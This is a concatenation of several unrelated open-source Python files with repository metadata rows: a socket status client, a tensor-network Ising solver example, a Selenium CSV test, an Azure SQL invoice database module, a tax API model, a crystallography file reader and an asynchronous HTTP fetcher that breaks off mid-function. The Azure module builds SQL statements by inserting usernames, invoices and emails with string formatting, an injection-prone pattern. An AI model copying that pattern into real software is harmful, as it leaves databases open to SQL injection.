if server_count:
message += "; #rcss: %d" % server_count
if server_user:
message += ", %s" % server_user
if len(team_count_map) >= 1:
message += "; ("
for team in sorted(team_count_map.keys()):
message += "%s x %d, " % (team, team_count_map[team])
message = message.rstrip(", ") + ")"
return message
def test_info():
message = ""
if server_count > 0:
if os.path.exists("/tmp/autotest::temp"):
message += "; autotest::temp"
if os.path.exists("/tmp/result.html") and os.access("/tmp/result.html", os.R_OK):
game_count = commands.getoutput("cat /tmp/result.html | grep \'>Game Count\' | sed \'s/ / /g\' | awk \'{print $5}\'")
win_rate = commands.getoutput("cat /tmp/result.html | grep \' WinRate\' | sed \'s/ / /g\' | awk \'{print $6}\'").strip(",")
if len(game_count) > 0 and len(win_rate) > 0:
message += "; #game: " + game_count + ", " + win_rate + "%"
return message
def communicate(s):
while 1:
try:
s.sendall(build_message())
except socket.error, (value, message):
print "send error: " + message
break
time.sleep(30)
def run():
while 1:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host,port))
except socket.error, (value, message):
print "connect error: " + message
s.close()
time.sleep(1)
continue
communicate(s)
s.close()
run()
| 27.656 | 146 | 0.554527 |
4a211bd0d224c4d753e9e1f7b869a9a04d9683dc | 5,322 | py | Python | examples/e06_search_gs_degeneracy_J124.py | marekrams/tnac4o | 41a2294842d1e129662e9cd61cc5eca7d3edb2d9 | [
"Apache-2.0"
] | 10 | 2020-06-12T02:32:30.000Z | 2022-01-19T11:11:31.000Z | examples/e06_search_gs_degeneracy_J124.py | marekrams/tnac4o | 41a2294842d1e129662e9cd61cc5eca7d3edb2d9 | [
"Apache-2.0"
] | 3 | 2020-06-04T18:59:02.000Z | 2020-06-11T11:15:12.000Z | examples/e06_search_gs_degeneracy_J124.py | marekrams/tnac4o | 41a2294842d1e129662e9cd61cc5eca7d3edb2d9 | [
"Apache-2.0"
] | 1 | 2022-01-19T11:39:56.000Z | 2022-01-19T11:39:56.000Z | # Copyright 2021 Marek M. Rams, Masoud Mohseni, Bartlomiej Gardas. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import argparse
import time
import tnac4o
import os
import numpy as np
def search_gs_J124(C=8, instance=1,
rot=0, beta=0.75,
D=48,
M=2**12, relative_P_cutoff=1e-8,
precondition=True):
'''
Runs a script searching for a ground state of a J124 instance defined on a chimera graph.
The ground state degeneracy is counted at no extra cost.
Instances are located in the folder ./../instances/.
Reasonable (but not neccesarily optimal) values of parameters for those instances are set as default.
Some can be changed using options in this script. See documentation for more information.
'''
# Initialize global logging level to INFO.
logging.basicConfig(level='INFO')
# filename of the instance of interest
if C == 8:
Nx, Ny, Nc = 8, 8, 8
filename_in = os.path.join(os.path.dirname(__file__),
'./../instances/Chimera_J124/C=8_J124/%03d.txt' % instance)
elif C == 12:
Nx, Ny, Nc = 12, 12, 8
filename_in = os.path.join(os.path.dirname(__file__),
'./../instances/Chimera_J124/C=12_J124/%03d.txt' % instance)
elif C == 16:
Nx, Ny, Nc = 16, 16, 8
filename_in = os.path.join(os.path.dirname(__file__),
'./../instances/Chimera_J124/C=16_J124/%03d.txt' % instance)
# load Jij couplings
J = tnac4o.load_Jij(filename_in)
# those instances are defined with spin numering starting with 1
# change to 0-base indexing
J = tnac4o.Jij_f2p(J)
# initializes solver
ins = tnac4o.tnac4o(mode='Ising', Nx=Nx, Ny=Ny, Nc=Nc, J=J, beta=beta)
ins.logger.info('Analysing J124 instance %1d on chimera graph of %1d sites.' % (instance, Nx * Ny * Nc))
# rotates graph to contract from different side/edge
if rot > 0:
ins.rotate_graph(rot=rot)
# applies preconditioning using balancing heuristics
if precondition:
ins.precondition(mode='balancing')
# search ground state (return lowest energy, full data stored in ins)
Eng = ins.search_ground_state(M=M, relative_P_cutoff=relative_P_cutoff, Dmax=D)
return ins
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-C", type=int, choices=[8, 12, 16], default=8,
help="Size of the chimera graph. Default is C8 (N=512).")
parser.add_argument("-ins", type=int, choices=range(1, 201), metavar="[1-200]", default=1,
help="Instance number (1-100). Default is 1.")
parser.add_argument("-b", type=float, default=0.75,
help="Inverse temperature. Default is set at 3.")
parser.add_argument("-D", type=int, default=48,
help="Maximal bond dimension of boundary MPS used to contract PEPS.")
parser.add_argument("-M", type=int, default=2**12,
help="Maximal number of partial states kept during branch-and-bound search.")
parser.add_argument("-P", type=float, default=1e-8,
help="Cuttof on the range of relative probabilities kept during branch-and-bound search.")
parser.add_argument("-s", dest='s', action='store_true',
help="Save results to txt file in ./results/")
parser.add_argument('-no-pre', dest='pre', action='store_false', help="Do not use preconditioning.")
parser.set_defaults(pre=True)
args = parser.parse_args()
Engs, degs = [], []
for rot in range(4):
keep_time = time.time()
ins = search_gs_J124(C=args.C, instance=args.ins, rot=rot, beta=args.b,
D=args.D, M=args.M, relative_P_cutoff=args.P, precondition=args.pre)
ins.logger.info('Rotation %1d; Total time : %.2f seconds', rot, time.time() - keep_time)
ins.show_solution(state=False)
Engs.append(ins.energy)
degs.append(ins.degeneracy)
Eng = min(Engs)
best = tuple(ii for ii, E in enumerate(Engs) if E == Eng)
deg = max(degs[ii] for ii in best)
print('Best found energy and its degeneracy for J124 instances on chimera graph C%1d, instance %1d' %(args.C, args.ins))
print('Energy = %1d' % Eng)
print('Degeneracy = %1d' % deg)
if args.s:
# save it to ./results/*.txt
filename = os.path.join(os.path.dirname(__file__),
'./results/J124_C=%1d_ins=%03d_beta=%0.2f_D=%1d_M=%1d_pre=%1d.txt'
% (args.C, args.ins, args.b, args.D, args.M, args.pre))
np.savetxt(filename, np.array([Eng, deg], dtype=int), delimiter=' ', header='Energy and degeneracy', fmt='%1d')
| 43.983471 | 124 | 0.637166 |
4a211c03164e87665d942fb261920e7bc1acceaf | 956 | py | Python | tests/src/CRC/check_performance_of_schoolwise_csv_download.py | JalajaTR/cQube | 6bf58ab25f0c36709630987ab730bbd5d9192c03 | [
"MIT"
] | null | null | null | tests/src/CRC/check_performance_of_schoolwise_csv_download.py | JalajaTR/cQube | 6bf58ab25f0c36709630987ab730bbd5d9192c03 | [
"MIT"
] | 2 | 2022-02-01T00:55:12.000Z | 2022-03-29T22:29:09.000Z | tests/src/CRC/check_performance_of_schoolwise_csv_download.py | JalajaTR/cQube | 6bf58ab25f0c36709630987ab730bbd5d9192c03 | [
"MIT"
] | null | null | null | import os
import time
from selenium.webdriver.support.select import Select
from Data.parameters import Data
from get_dir import pwd
from reuse_func import GetData
class download_schoollevel_csv():
def __init__(self,driver):
self.driver = driver
def test_schoolwise(self):
self.cal = GetData()
self.driver.find_element_by_xpath(Data.hyper).click()
self.cal.page_loading(self.driver)
p = pwd()
District_wise = Select(self.driver.find_element_by_id("downloader"))
District_wise.select_by_visible_text(" School_Wise Report ")
self.cal.page_loading(self.driver)
self.driver.find_element_by_id(Data.Download).click()
self.cal.page_loading(self.driver)
self.filename = p.get_download_dir() + "/School_level_CRC_Report.csv"
self.cal.page_loading(self.driver)
return os.path.isfile(self.filename)
def remove_csv(self):
os.remove(self.filename)
| 28.117647 | 76 | 0.713389 |
4a211d30e9ab19e8a4867609462d28c0a0799276 | 9,417 | py | Python | instance/db/azure/connazure.py | instance-id/verifier | 1d15f8203aeeb61d79658a77481bb846ab0f58bc | [
"MIT"
] | 7 | 2019-05-16T05:01:48.000Z | 2022-01-09T08:07:13.000Z | instance/db/azure/connazure.py | instance-id/verifier | 1d15f8203aeeb61d79658a77481bb846ab0f58bc | [
"MIT"
] | 5 | 2019-12-26T17:27:01.000Z | 2022-01-31T11:31:16.000Z | instance/db/azure/connazure.py | instance-id/verifier | 1d15f8203aeeb61d79658a77481bb846ab0f58bc | [
"MIT"
] | 1 | 2022-01-28T09:53:43.000Z | 2022-01-28T09:53:43.000Z | import pyodbc
import jsoncfg
from datetime import datetime
import traceback
import logging
# <editor-fold desc="Logging definitions">
from colorlog import ColoredFormatter
log = logging.getLogger(__name__)
LOG_LEVEL = logging.DEBUG
LOGFORMAT = " %(log_color)s%(levelname)-8s%(reset)s | %(log_color)s%(message)s%(reset)s"
logging.root.setLevel(LOG_LEVEL)
formatter = ColoredFormatter(LOGFORMAT)
stream = logging.StreamHandler()
stream.setLevel(LOG_LEVEL)
stream.setFormatter(formatter)
log.setLevel(LOG_LEVEL)
log.addHandler(stream)
# </editor-fold>
config = jsoncfg.load_config('instance/config/dbconfig.json')
# config = jsoncfg.load_config('../../../config/dbconfig.json')
dbdata = config.dbdata()
dbprefix = dbdata['dbprefix']
def dosql(sql, args=None, commit=False, response=None, num=0, curret=False):
driver = '{ODBC Driver 17 for SQL Server}'
cnxn = 'DRIVER=' + driver
cnxn += ';PORT=1433;SERVER=' + dbdata['address']
cnxn += ';PORT=1443;DATABASE=' + dbdata['dbname']
cnxn +=';UID=' + dbdata['usename']
cnxn +=';PWD=' + dbdata['password']
conn = pyodbc.connect(cnxn)
finish = False
result = 'Process ended before it was supposed to.'
try:
with conn.cursor() as cursor:
if args is not None:
cur = cursor.execute(sql, args)
else:
cur = cursor.execute(sql)
if curret is True:
return cur
if commit is True:
conn.commit()
if response is not None:
if response == 'single':
result = cursor.fetchone()
elif response == 'many':
result = cursor.fetchmany(num)
elif response == 'all':
result = cursor.fetchall()
elif response == 'id':
result = cursor.fetchone()
else:
pass
finally:
conn.close()
if response:
return result
# (sql, args=None, commit=False, response=None, num=0)
def db_setup():
validated_users = dbprefix + 'validated_users'
packages = dbprefix + 'packages'
args = validated_users
sql = "SELECT * FROM information_schema.tables WHERE table_name= '%s'" % args
usersresult = dosql(sql, None, False, 'single')
args = packages
sql = "SELECT * FROM information_schema.tables WHERE table_name = '%s'" % args
packagesresult = dosql(sql, None, False, 'single')
if usersresult is None:
args = (validated_users, validated_users)
sql = f"""
IF NOT EXISTS
(select * from INFORMATION_SCHEMA.TABLES where TABLE_NAME = '%s')
CREATE TABLE %s (
user_id int IDENTITY PRIMARY KEY,
username VARCHAR(50) NOT NULL,
email VARCHAR(75),
)""" % args
dosql(sql, None, True)
if packagesresult is None:
args = (packages, packages, validated_users)
sql = f"""
IF NOT EXISTS
(select * from INFORMATION_SCHEMA.TABLES where TABLE_NAME = '%s')
CREATE TABLE %s (
ID INT IDENTITY PRIMARY KEY,
user_id int FOREIGN KEY REFERENCES %s (user_id),
username VARCHAR(50) NOT NULL,
invoice VARCHAR (15) UNIQUE,
package VARCHAR(50),
purdate VARCHAR(10),
verifydate VARCHAR(10),
)""" % args
dosql(sql, None, True)
return "Creation of database tables completed."
else:
return "Tables already exist: " + usersresult[2] + " and " + packagesresult[2]
# Invoice lookup for automated verification process
# (sql, args=None, commit=False, response=None, num=0)
def find_invoice(invoice):
args = dbprefix, invoice
sql = "SELECT * FROM [%spackages] WHERE [invoice] = '%s'" % args
invoiceresult = dosql(sql, None, False, 'single')
if invoiceresult:
return True
else:
return False
# If user has already registered an invoice
# append new invoice otherwise create new entry
# (sql, args=None, commit=False, response=None, num=0)
def add_invoice(username, invoice, package, purdate, email=''):
args = dbprefix, invoice
sql = "SELECT * FROM [%spackages] WHERE [invoice] = '%s'" % args
invoiceresult = dosql(sql, None, False, 'single')
if invoiceresult is None:
args = dbprefix, username
sql = "SELECT * FROM [%svalidated_users] WHERE [username] = '%s'" % args
nameresult = dosql(sql, None, False, 'single')
if nameresult is not None:
if nameresult:
args = dbprefix, email, username,
sql = "UPDATE [%svalidated_users] SET [email] = '%s' WHERE [username] = '%s'" % args
dosql(sql, None, True)
args = dbprefix, int(nameresult[0]), username, invoice, package, purdate, str(datetime.now().strftime("%Y-%m-%d"))
sql = "INSERT INTO [%spackages] ([user_id], [username], [invoice], [package], [purdate], [verifydate]) VALUES ('%s', '%s', '%s', '%s', '%s', '%s')" % args
result = dosql(sql, None, True)
return result
if nameresult is None:
try:
args = dbprefix, username, email
sql = "INSERT INTO [%svalidated_users] ([username],[email]) VALUES ('%s', '%s')" % args
dosql(sql, None, True)
args = dbprefix, username
sql = "SELECT [user_id] FROM [%svalidated_users] WHERE [username] = '%s'" % args
insertresult = dosql(sql, None, False, 'single')
if insertresult:
args = dbprefix, int(insertresult.user_id), username, invoice, package, purdate, str(
datetime.now().strftime("%Y-%m-%d"))
sql = "INSERT INTO [%spackages] ([user_id], [username], [invoice], [package], [purdate], [verifydate]) VALUES ( '%s', '%s', '%s', '%s', '%s', '%s')" % args
result = dosql(sql, None, True)
return result
except Exception as e:
print(f'Could not insert row.')
traceback.print_exc()
else:
return 'Invoice number already registered. Please contact support.'
# Invoice deletion - use carefully
def delete_invoice(invoice):
args = dbprefix, invoice
sql = "DELETE FROM [%spackages] WHERE [invoice] = '%s'" % args
invoiceresult = dosql(sql, None, True)
return 'Deletion Completed'
# ------------------------ Manual lookup processes -------------------------------
def search_invoice(invoice):
driver = '{ODBC Driver 17 for SQL Server}'
cnxn = 'DRIVER=' + driver
cnxn += ';PORT=1433;SERVER=' + dbdata['address']
cnxn += ';PORT=1443;DATABASE=' + dbdata['dbname']
cnxn +=';UID=' + dbdata['usename']
cnxn +=';PWD=' + dbdata['password']
conn = pyodbc.connect(cnxn)
with conn.cursor() as cursor:
args = dbprefix, invoice
sql = "SELECT * FROM [%spackages] WHERE [invoice] = '%s'" % args
invoiceresult = cursor.execute(sql)
if invoiceresult is not None:
data1 = []
columns = [column[0] for column in invoiceresult.description]
for row in invoiceresult.fetchall():
data1.append(dict(zip(columns, row)))
if not data1:
conn.close()
return 'No invoice found', False
if invoiceresult is not None:
conn.close()
if not data1:
return 'No invoice found', False
data2 = [d for d in data1][0]
return data2['username'], data2
else:
conn.close()
return 'No invoice found', False
def search_user(username):
driver = '{ODBC Driver 17 for SQL Server}'
cnxn = 'DRIVER=' + driver
cnxn += ';PORT=1433;SERVER=' + dbdata['address']
cnxn += ';PORT=1443;DATABASE=' + dbdata['dbname']
cnxn +=';UID=' + dbdata['usename']
cnxn +=';PWD=' + dbdata['password']
conn = pyodbc.connect(cnxn)
with conn.cursor() as cursor:
args = (dbprefix, username + '%',)
sql = "SELECT [username] FROM [%svalidated_users] WHERE [username] LIKE '%s'" % args
userresult = cursor.execute(sql)
data1 = []
columns = [column[0] for column in userresult.description]
for row in userresult.fetchall():
data1.append(dict(zip(columns, row)))
with conn.cursor() as cursor:
args = (dbprefix, username + '%',)
sql = "SELECT [invoice], [package], [purdate], [verifydate] FROM [%spackages] WHERE [username] LIKE '%s'" % args
userresult2 = cursor.execute(sql)
data2 = []
columns2 = [column[0] for column in userresult2.description]
for row in userresult2.fetchall():
data2.append(dict(zip(columns2, row)))
conn.close()
if len(data1) is 0:
return 'User not found.'
elif len(data2) is 0:
return data1
else:
packlist = {'packages': data2}
data1[0].update(packlist)
if data1:
return data1
else:
return 'No User found'
| 37.971774 | 176 | 0.561431 |
4a211d7f79f1e589c5bf2b9681c92c0011815821 | 6,016 | py | Python | taxamo/models/transaction_lines.py | piotrts/taxamo-python | be3b46a6ec320166999987b65384376be6f57111 | [
"Apache-2.0"
] | null | null | null | taxamo/models/transaction_lines.py | piotrts/taxamo-python | be3b46a6ec320166999987b65384376be6f57111 | [
"Apache-2.0"
] | null | null | null | taxamo/models/transaction_lines.py | piotrts/taxamo-python | be3b46a6ec320166999987b65384376be6f57111 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
"""
Copyright 2014-2015 Taxamo, Ltd.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
class Transaction_lines:
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually."""
def __init__(self):
self.swaggerTypes = {
'product_type': 'str',
'deducted_tax_amount': 'number',
'deducted_tax_rate': 'number',
'supply_date': 'str',
'invoice_image_url': 'str',
'tax_number_service': 'str',
'seller_tax_number': 'str',
'id': 'number',
'tax_supported': 'bool',
'unit_price': 'number',
'unit_of_measure': 'str',
'quantity': 'number',
'custom_fields': 'list[custom_fields]',
'tax_region': 'str',
'line_key': 'str',
'invoice_number': 'str',
'product_class': 'str',
'tax_name': 'str',
'product_code': 'str',
'amount': 'number',
'invoice_image_url_secret': 'str',
'custom_id': 'str',
'informative': 'bool',
'tax_amount': 'number',
'tax_entity_additional_id': 'str',
'ship_from_country_code': 'str',
'tax_rate': 'number',
'additional_currencies': 'additional_currencies',
'total_amount': 'number',
'product_tax_code': 'str',
'tax_entity_name': 'str',
'refunded_tax_amount': 'number',
'description': 'str',
'tax_deducted': 'bool',
'tax_country_code': 'str',
'refunded_total_amount': 'number'
}
#Product type, according to dictionary /dictionaries/product_types.
self.product_type = None # str
#Deducted tax amount, calculated by taxmo.
self.deducted_tax_amount = None # number
#Deducted tax rate, calculated by taxamo.
self.deducted_tax_rate = None # number
#Date of supply in yyyy-MM-dd format.
self.supply_date = None # str
#Invoice image URL - provided by Taxamo.
self.invoice_image_url = None # str
#Tax number service identifier - if available for a given region and the region is enabled.
self.tax_number_service = None # str
#Seller's tax number in the tax country - used for physical goods and assigned from merchant configuration.
self.seller_tax_number = None # str
#Generated id.
self.id = None # number
#Is tax supported on this line.
self.tax_supported = None # bool
#Unit price.
self.unit_price = None # number
#Unit of measure.
self.unit_of_measure = None # str
#Quantity Defaults to 1.
self.quantity = None # number
#Custom fields, stored as key-value pairs. This property is not processed and used mostly with Taxamo-built helpers.
self.custom_fields = None # list[custom_fields]
#Tax region code - e.g. EU, US, NO, JP...
self.tax_region = None # str
#Generated line key.
self.line_key = None # str
#Invoice number.
self.invoice_number = None # str
#Product class
self.product_class = None # str
#Tax name, calculated by taxamo. Can be overwritten when informative field is true.
self.tax_name = None # str
#Internal product code, used for invoicing for example.
self.product_code = None # str
#Amount. Required if total amount or both unit price and quantity are not provided.
self.amount = None # number
#Invoice image URL secret - provided by Taxamo.
self.invoice_image_url_secret = None # str
#Custom id, provided by ecommerce software.
self.custom_id = None # str
#If the line is provided for informative purposes. Such line must have :tax-rate and optionally :tax-name - if not, API validation will fail for this line.
self.informative = None # bool
#Tax amount, calculated by taxamo.
self.tax_amount = None # number
#Tax entity additional id.
self.tax_entity_additional_id = None # str
#Two-letter ISO country code, e.g. FR.
self.ship_from_country_code = None # str
#Tax rate, calculated by taxamo. Must be provided when informative field is true.
self.tax_rate = None # number
#Additional currency information - can be used to receive additional information about invoice in another currency.
self.additional_currencies = None # additional_currencies
#Total amount. Required if amount or both unit price and quantity are not provided.
self.total_amount = None # number
#External product tax code for a line, for example TIC in US Sales tax.
self.product_tax_code = None # str
#To which entity is the tax due.
self.tax_entity_name = None # str
#Refunded tax amount, calculated by taxmo.
self.refunded_tax_amount = None # number
#Line contents description.
self.description = None # str
#True if the transaction line is deducted from tax and no tax is applied (it is untaxed).
self.tax_deducted = None # bool
#Two-letter ISO country code, e.g. FR.
self.tax_country_code = None # str
#Refunded total amount, calculated by taxmo.
self.refunded_total_amount = None # number
| 43.912409 | 163 | 0.62234 |
4a211d8599ba1f4e18ec9d13b40278d79f7c5d46 | 2,523 | py | Python | iotbx/cns/index_fobs_sigma_reader.py | rimmartin/cctbx_project | 644090f9432d9afc22cfb542fc3ab78ca8e15e5d | [
"BSD-3-Clause-LBNL"
] | null | null | null | iotbx/cns/index_fobs_sigma_reader.py | rimmartin/cctbx_project | 644090f9432d9afc22cfb542fc3ab78ca8e15e5d | [
"BSD-3-Clause-LBNL"
] | null | null | null | iotbx/cns/index_fobs_sigma_reader.py | rimmartin/cctbx_project | 644090f9432d9afc22cfb542fc3ab78ca8e15e5d | [
"BSD-3-Clause-LBNL"
] | null | null | null | from __future__ import division
from cctbx import miller
from cctbx import crystal
from cctbx.array_family import flex
class index_fobs_sigma_line(object):
def __init__(self, raw_line):
self.is_complete = False
flds = raw_line.replace("="," ").split()
if (len(flds) != 8): return
if (flds[0].lower() not in ("inde", "index")): return
if (flds[4].lower() != "fobs"): return
if (flds[6].lower() != "sigma"): return
self.names = [flds[4], flds[6]]
try: self.index = tuple([int(i) for i in flds[1:4]])
except Exception: return
try: self.fobs = float(flds[5])
except Exception: return
try: self.sigma = float(flds[7])
except Exception: return
self.is_complete = True
class reader(object):
def __init__(self, file_name=None, file_object=None, max_header_lines=30):
assert [file_name, file_object].count(None) == 1
if (file_object is None):
file_object = open(file_name)
self._names = None
self._indices = flex.miller_index()
self._data = flex.double()
self._sigmas = flex.double()
have_data = False
self.n_lines = 0
for raw_line in file_object:
self.n_lines += 1
ifs = index_fobs_sigma_line(raw_line)
if (not ifs.is_complete):
if (raw_line.strip().lower() == "end"):
break
if (self.n_lines == max_header_lines or have_data):
raise RuntimeError, "Unkown file format."
else:
if (self._names is None): self._names = ifs.names
self._indices.append(ifs.index)
self._data.append(ifs.fobs)
self._sigmas.append(ifs.sigma)
have_data = True
if (not have_data):
raise RuntimeError, "No data found in file."
def indices(self):
return self._indices
def data(self):
return self._data
def sigmas(self):
return self._sigmas
def as_miller_arrays(self,
crystal_symmetry=None,
force_symmetry=False,
merge_equivalents=True,
base_array_info=None):
if (crystal_symmetry is None):
crystal_symmetry = crystal.symmetry()
if (base_array_info is None):
base_array_info = miller.array_info(source_type="cns_index_fobs_sigma")
miller_set = miller.set(
crystal_symmetry=crystal_symmetry,
indices=self.indices()).auto_anomalous()
return [miller.array(
miller_set=miller_set,
data=self.data(),
sigmas=self.sigmas())
.set_info(base_array_info.customized_copy(labels=self._names))
.set_observation_type_xray_amplitude()]
| 31.5375 | 77 | 0.659929 |
4a211e180e7870255408fadb2547d0b159a5c05f | 17,674 | py | Python | AsyncFetcher.py | bakwc/PyAsyncFetcher | 06bfdabe43ec1154230961d6ec796998a94b2cf3 | [
"MIT"
] | null | null | null | AsyncFetcher.py | bakwc/PyAsyncFetcher | 06bfdabe43ec1154230961d6ec796998a94b2cf3 | [
"MIT"
] | null | null | null | AsyncFetcher.py | bakwc/PyAsyncFetcher | 06bfdabe43ec1154230961d6ec796998a94b2cf3 | [
"MIT"
] | null | null | null | import time
import thread
import httplib
import socket
import select
import os
from collections import defaultdict
import Queue
from StringIO import StringIO
import random
# ------------------------------------------------------------------------------------
class ERROR:
CONNECTION_FAILED = -100
CONNECTION_DROPED = -101
MAX_QUEUE_SIZE = -110
MAX_HOST_CONNECTIONS = - 111
# ------------------------------------------------------------------------------------
class SETTINGS:
# After INACTIVE_TIMEOUT after last received data
# connection will be removed from pool.
INACTIVE_TIMEOUT = 3 * 60
# Timeout for connecting to host. Host connections are blocking - do not use too big value.
CONNECTION_TIMEOUT = 4
# Number of retries if failure.
DEFAULT_ATTEMPTS = 3
# Send error response if too many requests incoming.
MAX_QUEUE_SIZE = 1000
# If we processing request too long - consider it dead
REQUEST_PROCESSING_TIMEOUT = 2 * 60
# Time to cache dns responses, seconds
DNS_CACHE_TIME = 60 * 60
# Time to cache dns errors
DNS_FAIL_CACHE_TIME = 2 * 60
# Maximum number of connections per host
MAX_CONNECTIONS_PER_HOST = 300
# ------------------------------------------------------------------------------------
def LOG_DEBUG_DEV(msg):
#print '[DEBUG]', msg
pass
# ------------------------------------------------------------------------------------
def LOG_WARNING(msg):
print '[WARNING]', msg
# ------------------------------------------------------------------------------------
class _StrSocket(object):
def __init__(self, response_str):
self._file = StringIO(response_str)
def makefile(self, *args, **kwargs):
return self._file
# ------------------------------------------------------------------------------------
def _buildRequest(host, method, query, data):
request = '{method} http://{host}{query} HTTP/1.1\r\n'\
'Host: {host}\r\n'\
'Connection: Keep-Alive\r\n'.format(method=method, query=query, host=host)
if data is not None:
request += 'Content-Type: application/x-www-form-urlencoded\r\n'\
'Content-Length: {len}\r\n'.format(len=str(len(data)))
request += '\r\n'
if data is not None:
request += data
return request
# ------------------------------------------------------------------------------------
class _Connection(object):
# ------------------------------------------------------------------------------------
def __init__(self, host, ep, dnsResolver):
self.host = host
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = host.split(':')
if len(host) == 0:
raise Exception("wrong host")
elif len(host) == 1:
host.append(80)
host[1] = int(host[1])
host[0] = dnsResolver.resolve(host[0])
host = tuple(host[:2])
self.sock.settimeout(SETTINGS.CONNECTION_TIMEOUT)
self.sock.setblocking(0)
ep.register(self.sock.fileno(), select.EPOLLOUT)
try:
self.sock.connect(host)
except socket.error as e:
if e.errno != 115:
self.sock.close()
raise e
self.clear()
self.lastResponse = time.time()
self.state = 'connecting'
# ------------------------------------------------------------------------------------
def clear(self):
self.__buffer = ''
self.request = None
self.__req = None
# ------------------------------------------------------------------------------------
def fileno(self):
return self.sock.fileno()
# ------------------------------------------------------------------------------------
def sendRequest(self, httpRequest):
LOG_DEBUG_DEV('send request')
self.request = httpRequest
req = _buildRequest(self.host, httpRequest.method, httpRequest.query, httpRequest.data)
if self.state == 'connecting':
LOG_DEBUG_DEV('connecting')
self.__req = req
else:
res = self.sock.send(req)
LOG_DEBUG_DEV('sending: %s' % str(res))
# ------------------------------------------------------------------------------------
def onConnected(self):
LOG_DEBUG_DEV('on connected')
self.state = 'connected'
self.lastResponse = time.time()
if self.__req is not None:
res = self.sock.send(self.__req)
LOG_DEBUG_DEV('sending: %s' % str(res))
self.__req = None
# ------------------------------------------------------------------------------------
def processResponse(self):
LOG_DEBUG_DEV('process response')
resp = self.sock.recv(1024)
if len(resp) > 0:
self.lastResponse = time.time()
self.__buffer += resp
source = _StrSocket(self.__buffer)
response = httplib.HTTPResponse(source)
response.begin()
status = response.status
data = response.read()
LOG_DEBUG_DEV('response parsed')
return (status, data, self.request)
# ------------------------------------------------------------------------------------
def isActive(self):
return time.time() < self.lastResponse + SETTINGS.INACTIVE_TIMEOUT
# ------------------------------------------------------------------------------------
class _ConnectionManager(object):
# ------------------------------------------------------------------------------------
def __init__(self, dnsResolver):
self.__connections = {} # host -> list of connections
self.__dnsResolver = dnsResolver
# ------------------------------------------------------------------------------------
def getConnection(self, host, ep):
hostConnections = self.__connections.get(host, None)
if hostConnections is None:
return _Connection(host, ep, self.__dnsResolver)
conn = hostConnections[0]
del hostConnections[0]
if len(hostConnections) == 0:
del self.__connections[host]
return conn
def getWaitingConnectionsNum(self, host):
return len(self.__connections.get(host, []))
# ------------------------------------------------------------------------------------
def returnConnection(self, connection):
connection.clear()
self.__connections.setdefault(connection.host, []).append(connection)
# ------------------------------------------------------------------------------------
def removeOldConnections(self, ep):
newConnections = {}
for host, connections in self.__connections.iteritems():
goodConnections = []
for conn in connections:
if conn.isActive():
goodConnections.append(conn)
else:
try:
ep.unregister(conn.sock.fileno())
except IOError:
pass
if len(goodConnections) > 0:
newConnections[host] = goodConnections
self.__connections = newConnections
# ------------------------------------------------------------------------------------
def removeConnection(self, fno):
newConnections = {}
for host, connections in self.__connections.iteritems():
goodConnections = []
for conn in connections:
if conn.fileno() != fno:
goodConnections.append(conn)
if len(goodConnections) > 0:
newConnections[host] = goodConnections
self.__connections = newConnections
# ------------------------------------------------------------------------------------
def printStatus(self):
print 'connection-manager:', len(self.__connections)
for h in self.__connections:
print h, len(self.__connections[h])
# ------------------------------------------------------------------------------------
def getStatusDict(self):
status = {}
for h, c in self.__connections.iteritems():
status['waiting_host_connections.%s' % h] = len(c)
return status
# ------------------------------------------------------------------------------------
class _DnsCachingResolver(object):
# ------------------------------------------------------------------------------------
def __init__(self):
self.__cache = {} # hostname => (time, [ip1, ip2, ... ])
# ------------------------------------------------------------------------------------
def resolve(self, hostname):
currTime = time.time()
cachedTime, ips = self.__cache.get(hostname, (0, []))
timePassed = currTime - cachedTime
if (timePassed > SETTINGS.DNS_CACHE_TIME) or (not ips and timePassed > SETTINGS.DNS_FAIL_CACHE_TIME):
prevIps = ips
ips = self.__doResolve(hostname)
if not ips:
ips = prevIps
self.__cache[hostname] = (currTime, ips)
if len(self.__cache) > 10000:
self.__cache = {}
return None if not ips else random.choice(ips)
# ------------------------------------------------------------------------------------
def __doResolve(self, hostname):
LOG_DEBUG_DEV('resolving %s' % hostname)
try:
ips = socket.gethostbyname_ex(hostname)[2]
except socket.gaierror:
LOG_WARNING('failed to resolve host %s' % hostname)
ips = []
return ips
# ------------------------------------------------------------------------------------
class HttpRequest(object):
def __init__(self, host, method, query, data, callback):
self.host = host
self.method = method
self.query = query
self.data = data
self.callback = callback
self.attempts = SETTINGS.DEFAULT_ATTEMPTS
# ------------------------------------------------------------------------------------
def signature(self):
return str(self.host) + '\n' + str(self.method) + '\n' + str(self.query) + '\n' + str(self.data)
# ------------------------------------------------------------------------------------
class AsyncFetcher(object):
# ------------------------------------------------------------------------------------
def __init__(self):
self.__epoll = select.epoll()
self.__requestQueue = Queue.Queue()
self.__responseQueue = Queue.Queue()
self.__connections = {} # fileno => http connection
self.__dnsResolver = _DnsCachingResolver()
self.__connectionManager = _ConnectionManager(self.__dnsResolver)
self.pipeToThread = os.pipe()
self.pipeToMain = os.pipe()
self.__currentRequests = {}
self.__connectionsNumPerHost = defaultdict(int)
thread.start_new_thread(self.__workerThread, ())
thread.start_new_thread(self.__mainThread, ())
# ------------------------------------------------------------------------------------
def fetch(self, request):
LOG_DEBUG_DEV('fetch request')
if self.__requestQueue.qsize() > SETTINGS.MAX_QUEUE_SIZE or\
self.__responseQueue.qsize() > SETTINGS.MAX_QUEUE_SIZE:
try:
LOG_DEBUG_DEV('max queue size')
